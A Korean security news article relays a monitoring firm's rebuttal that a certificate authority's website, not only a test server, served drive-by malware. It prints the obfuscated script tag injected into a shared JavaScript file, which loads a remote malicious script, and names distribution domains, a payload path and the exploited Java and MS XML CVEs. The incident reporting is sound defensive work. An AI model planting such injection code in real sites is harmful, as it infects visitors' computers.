데일리시큐는 지난 11월 20일 오후 한국전자인증 홈페이지에서 악성코드가 유포됐다는 빛스캔 측의 제보를 받고 가장 먼저 한국전자인증 홈페이지 관리자와 직접 전화통화 및 회사 관계자와 취재를 진행했다. 모 보안 관련 매체에서는 빛스캔 측의 내용만 그대로 반영한 기사가 나간 것과는 달리 데일리시큐는 한국전자인증, KISA, 금융보안 관련 기관 등 다방면의 취재를 거쳐 최종 기사를 작성해 업데이트한 것이다. (관련 기사: dailysecu.com/news_view.php?article_id=3247)
 
이에 한국전자인증은 빛스캔 측의 내용만 편파 보도했다고 여겨 모 보안관련 매체의 기사에 대해 해명 내용을 자사 홈페이지 공지사항란에 공지했다. 내용인 즉슨, 데일리시큐와 최초 취재 과정에서 언급한 내용 그대로였다. 홈페이지가 해킹을 당한 것도 아니고 단순 테스트 서버에 악성코드가 걸렸지만 해당 테스트 서버는 사용되지 않는 페이지라 이용자가 악성코드에 감염된 사실은 없다는 해명이었다. 
 
하지만 다시 빛스캔(대표 문일준) 측은 11월 29일 밤, 한국전자인증 홈페이지에서 악성코드가 유포된 것이 사실이라는 증거 자료를 보내왔다. 그 이유에 대해 빛스캔 측은 “한국전자인증의 사후 대응에 대한 우려와 사후의 공지내용에 대해 명확한 사실을 짚고자 더욱 확실한 자료를 공개하게 됐다”고 밝혔다.
 
또한 “빛스캔은 현재 국내 120만개의 웹서비스와 해외 10만여 개 이상의 웹서비스에 대해 상시적으로 모니터링을 하고 있다. 매 모니터링 시마다 많은 이슈들이 발생하지만 개별 웹서비스의 악성코드 유포 이슈에 대해서는 공개를 하지 않는 것을 원칙으로 하고 있다”며 “그러나 이번 한국전자인증의 경우 개별 웹서비스의 악성코드 유포 이슈에 대해서는 전자상거래 시장에서 차지하는 범위와 영향력이 큰 심각한 상황이므로 적극적인 개선과 전체 분야에 걸쳐서 강력한 점검들이 요구 되기에 공개적으로 언급을 한 것이다. 본 설명도 한국의 인터넷 신뢰 기반 구조가 위험에 처해서는 안되기에 추가 상세 설명을 통해 문제의 본질과 강력한 노력의 필요성을 언급하고자 한다. 향후 더 큰 위험 상황 속에서 수습이 불가능한 상황을 맞아서는 안될 것”이라고 경고했다.  
 
더불어 “현재 한국전자인증의 공지내용에 따르면 추가적인 사실확인과 대응노력을 사실상 종결한 것으로 판단된다”며 “이에 추가 설명과 함께 국내 인터넷 환경의 안정성을 위해 추가적인 노력이 더 필요한 상황이다”라고 강조했다.
 
-한국전자인증 공지사항 내용: board.crosscert.com/gnuboard/bbs/board

다음은 빛스캔이 보내온 한국전자인증 악성코드 유포에 대한 의견 전문이다. 한국전자인증 측은 아래에서 언급되는 팩트들을 다시 한번 살펴보고 악성코드 유포 재발방지를 위한 웹서비스 재점검에 들어가야 할 것으로 보인다. 또한 악성코드 감염을 예방할 수 있는 근본적인 대책도 마련해야 할 것이다. 
 

<공지내용의 사실내용 중에서 사실과 다른 부분을 언급하도록 하겠다. “한국전자인증의 홈페이지는 해킹 되지 않았다.?” 홈페이지가 바뀌고 이상한 그림으로 올려져 있어야 해킹이 아니다. 아래와 같이 올해 5월에 있었던 researcher.ibm.com의 홈페이지 해킹과 같은 유형만이 해킹이 아닌 것이다.  

Ibm.com의 해킹 사례는 자기과시욕이 강한 레벨 낮은 공격자들의 해킹 사례다. 그러나 최근의 해킹들은 이익을 목적으로 하는 해킹이 급증하고 있으며 홈페이지 변조가 아닌 방문자들에게 악성코드 감염을 목적으로 하는 숙주 역할을 하도록 하는 것이 주된 목적이다. 금전적인 이득을 목적으로 공격을 하며, 사용자 정보를 빼내어 가기 위해 홈페이지의 소스코드를 일부 수정하는 형식으로 한국 내에 많은 영향을 미치고 있는 것이 현실이다. (www.facebook.com/bitscan 게시물 참고)
 
(한국전자인증) 홈페이지가 변조된 것은 아니지만 악성코드 유포에 이용된 것은 명확한 사실이며, 공격자의 이익을 위해 도구로 사용된 것은 명확한 사실이다. 내부망에 대한 침입과 Database에 대한 정보 유출 이후에 활용도가 낮아질 경우 최종적으로 악성코드 감염을 위한 숙주로 이용되는 것이 지금까지의 관찰 결과이며 이 관찰 결과에 따라 최종적인 행동들이 발견 되었기에 심각성은 더욱 높은 것이라 할 수 있다.
 
아래 이미지는 홈페이지 접속 시에 사용자의 어떤 행동 없이도 자동으로 불려지는 부분들을 모니터링한 내용이다. 웹서비스를 방문만 해도 방문한 사용자 PC의 브라우저 상에서는 모든 연결 부분들이 실행된다. 연결 부분에는 공용기능을 위한 Javascript 함수 부분과 웹페이지를 꾸며주는 폰트와 컬러를 정의하는 CSS 파일들이 호출 되는 것을 볼 수 있다. 보통 index.html 파일을 시작페이지로 호출 할 때에는 하나의 파일만이 호출되는 것이 아니며 홈페이지를 구성하는 기능들과 내부를 꾸며주는 많은 파일들이 같이 받아져서 실행이 된다. 최근의 공격자들은 이런 공용 파일의 내용을 변경하거나 추가해 자동으로 실행 되게 함으로써 악성코드 감염에 활용하고 있다. 결론적으로 웹서비스 상에서 사용은 되지 않는 페이지가 아니라 일반사용자가 방문할 시에 무조건 불려지는 상태에 있었음을 알려드린다.

 
캡쳐에서도 선택된 부분에서 악성링크의 유포에 이용되고 있는 toxxxx.co.kr/com.js(일부 x처리)가 호출되고 있음을 명백하게 확인 할 수 있다. 해당 악성링크인 toxxxx.co.kr/com.js의 경우 11월 2주차 빛스캔 한국 인터넷 위협 분석 브리핑의 MalwareNet 부분에서 전체 수백여 개 이상의 다단계 유포망중 가장 예의 주시하고 있는 유포망으로 이미 언급을 한 바 있다.
 
p4ssion.com/321 11월 16일 게재판 정식 보고서는 11월 14일에 전체 MalwareNet 이름인 toxxxx.co.kr/com.js가 기술 되어 전달 되었으며 공개버전인 브리핑에서는 xxxx.co.kr/com.js로 전환되어 기술 되어 있다. 동일 악성링크에 대한 설명임을 확인 할 수 있다. 정보제공 서비스의 의미대로 사전 경고를 드렸으며 차단을 했다면 감염과는 관계가 없다. 호출 부분만을 따로 떼어서 보면 다음과 같이 목록을 볼 수 있다.

 
호출 부분만을 따로 떼어서 살펴본 부분이며 테스트서버라고 주장하는 곳은 Js 파일 내에서 <script src=http://%74o%74ime%2eco%2Ekr/com%2Ej%73> 코드가 실행되도록 설정한 것을 확인 할 수 있다. 1번 항목이 메인 웹서버에서 호출이 되었고 1번 항목인 DivDrag.js 파일 내에는 2번과 같은 Javascript 코드가 들어가 있다. 그 결과로 3번에 해당하는 toxxxx.co.kr/com.js 파일이 호출됨을 확인 할 수 있다.
 
악성링크를 Ascii 코드 값으로 넣은 이유는(%74o%74ime%2eco%2Ekr/com%2Ej%73) 쉽게 탐지 하지 못하도록 가볍게 난독화한 부분이 된다.
 
결론적으로 테스트 서버라고 주장하는 곳도 웹서비스가 활성화 되어 있었으며 해당 웹서비스의 파일은 공격자에 의해(소스 복사라고 공지 하였으나 이 부분은 다시 설명 드리겠다.) 수정되어 악성코드 유포에 직접 이용된 상황이라 할 수 있다. 홈페이지 화면변조와 같은 수준 낮은 해킹은 없었으나 더 높은 수준의 악성코드 유포를 위한 인위적인 조작은 발생했다는 것이 명백한 사실이다.
 
다음은 “11월 16일 홈페이지 수정작업 시에 개발자가 인터넷에 공개된 소스를 참고 할 때 들어가 있던 URL이 그대로 들어가 있었고 수정이 안된 상태여서 구글이 탐지를 했다”는 내용에 대해 언급하겠다.
 
Toxxxx.co.kr/com.js 악성링크의 경우 최초 악성링크 발견에 이용된 것이 2012년 10월 26일이다. 매우 은밀하게 국내 인터넷 웹서비스를 해킹하고 소스코드를 변경해 악성코드를 유포 하였으므로 한동안 정체를 아는 곳은 거의 없었을 것이다. 빛스캔에서 130만여 개의 웹서비스를 체크한 결과 중에서 방문자가 비교적 높은 60여 곳 가량에서 최종적으로 악성코드 유포에 이용되고 있었다.  간단히 com.js 파일내의 내용만을 계속해서 변경해 새로운 악성코드를 계속 유포하는데 이용 되었는데 그 기록은 다음과 같다.

 
16일 이후 사용된 링크의 구조는 다음과 같은 형식으로 되어 있으며 최종 악성파일 다운로드 URL만 지속적으로 변경이 된 것으로 관찰되며 그 중 하나는 구글의 차단 내역과 도메인이 동일하다. Toxxxx.co.kr/com.js가 불려지면 공격코드가 들어 있는 링크가 동작하게 되면 붉은색 박스의 링크들이 브라우저 및 사용자 PC의 취약성을 확인하고 공격하게 된다. 권한 획득이 되면 그 이후 최종 악성파일을 다운로드 시켜서 시스템에 설치하는 구조가 발견된 내역이다.  

 
이 악성링크의 경우 그 어떤 공개게시판 및 소스코드를 관리하는 사이트에도 감염된 사례가 없으며 악성링크가 포함된 웹서비스들 모두 공격자의 특성상 찾기 힘든 곳이나 암호화된 형태로 들어가 있는 것이 대부분이다. 10.26일 처음 생성되어 은밀하게 공격에 이용된 악성링크가 포함된 소스코드를 인터넷 상에서 다운로드 받을 수 있는 비율은 얼마나 될까? 단 3주 정도의 시간 사이에 개발자가 아주 찾기 힘든 60여 개 가량의 웹서비스에서 해당 소스를 복사 할 수 있는 확률은 얼마나 될까? 
 
확률상으로 계산하기 어려울 정도의 낮은 확률이라는 것을 말씀드린다. 또한 11월 16일 수정작업이 있었다고 명시를 했는데 11.16일 이후에도 toxxxx.co.kr/com.js 파일의 내용은 4회 이상 악성링크가 추가되었고 최종 악성파일들은 변경되었다. 발견된 최종 악성파일은 다음과 같이 주요 국내백신만을 우회한 형태로 탐지가 안되도록 하여 시스템에 설치가 된 상황이다.

 
11월 16일 이후에도 설사 정말 희박한 확률로 개발자가 악성링크가 포함된 소스코드를 복사해 사용했다 하더라도 최소 4회 이상의 지속적인 악성코드 유포시도는 발생 할 수 밖에 없다. 홈페이지 연결 시에 자동으로 실행되는 모든 링크 부분에서 한국전자인증에서 테스트 서버이고 사용자가 접근 할 수 없는 곳에 있었다는 해명은 잘못된 내용임을 알려드린다. 따라서 최소한 11월 16일 이후의 4회 이상의 악성코드 유포는 모든 방문자를 대상으로 명백하게 발생되었으며 사용된 취약성은 Java, IE 최신 취약성들이 결합된 다중 취약성이 이용되어 방문자들이 직접 영향을 받았을 것으로 판단된다. 사용자 PC 공격에 이용된 취약성은 다음과 같다.
 
CVE-2011-3544 : Java Applet 취약성
CVE-2012-0507 : Java Applet 취약성(2012년 1월 취약성 발견 및 보고됨)
CVE-2012-1723 : Java Applet 취약성(2012년 6월 취약성 발견 )
CVE-2012-1889 :  MS XML Core Service 취약성(2012년 6월 취약성 발견)
CVE-2012-4681 : Java Applet 취약성(2012년 8.24일 취약성 발견)
CVE-2012-5076 : Java Applet 취약성(2012년 10.16일 취약성 발견 )
 
2012년에 발견된 Java Applet 관련 취약성이 대거 활용되었으며 MS XML 취약성도 공격에 이용되었음을 알 수 있다. 일반적으로 Java의 경우 업데이트 관리가 제대로 안 되는 점을 볼 때 공격 성공률은 낮은 수준이 아닐 것으로 예상된다.
 
추가적으로 구글의 탐지방식은 악성링크를 탐지하는 방식이 아니며 크롬 브라우저에서 접근 시에 붉은 화면으로 나타나는 것은 Drive by download라고 하는 접근 시 다운로드 되는 이벤트들이 발생 될 때 차단 화면이 나오게 된다. 이후 상세한 정보를 전달하기 위해 하위 링크를 검사해 악성링크의 내용에 대해서 알려주는 역할을 하고 있다. 즉 구글의 Stopbadware의 정보 등재는 홈페이지에서 다운로드 이벤트가 발견되었다는 것이며 그 결과는 빛스캔에서 추적한 내용과 동일한 결과를 보이고 있다는 점이다.
 
구글의 경우 수십 만대 이상의 검색서버를 운영하고 있으나 억 단위 이상의 홈페이지들을 방문하기 위해서는 주기적인 방문이 필요하며 그 방문 주기는 충분한 간격을 두고 있다. 예상하기로는 1~3일 정도는 차이가 있는 것으로 판단된다. 구글의 경우에도 홈페이지 수정 1일 이후 비정상적인 파일이 다운로드되고 있다는 Drive by Download 이벤트를 감지하고 자동으로 등록 된 것이다.
 
 
상세 내용을 살펴 보면 동의 없는 다운로드 및 설치가 발견되었다는 것과 방문 일시가 11.17일에 확인했음을 기록하고 있다. 또한 악성소프트웨어 즉 악성코드가 내려온 도메인의 기록을 보면 빛스캔에서 추적한 악성링크와 동일함을 확인 할 수 있다. 구글 정보에 표시된 내용은 wabnxxx.com의 경우 공격코드가 실행되는 부분이며 xiuxxx.com의 경우 공격코드 성공 이후 최종 악성파일을 다운로드 해 사용자 PC에 설치하는 도메인이 된다.
 
이 당시에 다운로드된 파일은 빛스캔의 PCDS 기록에 따르면 xx.xiuxxx.com/010/qaz2.exe 파일이 다운로드 된 기록을 가지고 있다. 구글에서 탐지된 기록과 빛스캔의 기록은 동일한 사실을 보여주고 있다.
 
마지막으로 구글의 경우 구글 Bot이 악성코드 배포 URL을 크롤링했다고 하여 악성코드 유포 도메인으로 등록을 하지 않으며 구글은 철저하게 이벤트가 발생된 홈페이지를 대상으로 등록을 한다. 배포 URL을 이벤트가 발생되지 않는데도 불구하고 대규모로 추적을 하는 곳은 빛스캔이 하는 분야이며 빛스캔의 경우에도 최종 사이트에 대한 경고는 하지 않는다. 구글은 해당 홈페이지에서 동의 없는 다운로드 이벤트가 발생 할 경우에 그 홈페이지 자체를 등록하고 발생된 이벤트를 추적하는 프로세스를 가지고 있다. 구글 Bot은 크롤링이 기반이라서 당연히 오해 할 수 있다. 하지만 악성코드 유포 사이트에 대한 등록은 많은 문제가 발생 될 수 있어서 이벤트가 발생했을 때만 등록된다. 이 부분도 사실 관계가 잘못 되었기에 알려드린다.
 
명백하게 공지된 내용에 대해 수집된 데이터와 사실관계를 바탕으로 해 정확한 설명을 전달했다.또한 내부망 침입 가능성에 대한 이슈는 제외하고 최대한 한국전자인증의 공지사항 입장을 반영하여 테스트서버, 개발자의 실수 가능성까지 감안해 사실관계를 정리했다.
 
지금 지적하고 있는 문제는 한 기업의 악성코드 유포 이슈가 아닌 한국 전자상거래 및 신뢰기반 구축 시장이 큰 혼란에 빠질 수 있는 상황이라 전체 시스템에 대해 강력한 보안점검과 혹시라도 모를 내부 침입에 대해 분석하고 대책을 강구해야 하는 상황이다. 또한 공인인증 시스템의 훼손 시 보호 및 복구 방안에 대해서도 강력하게 논의가 필요한 시점이라 할 것이다. Fact 데이터를 말로서 속일 수는 없다. 끝> 
 
악성코드 유포에 대한 공인인증기업인 한국전자인증의 적극적이고 근본적인 재발방지 대책 마련이 필요한 시점이다.
 
데일리시큐 길민권 기자 mkgil@dailysecu.com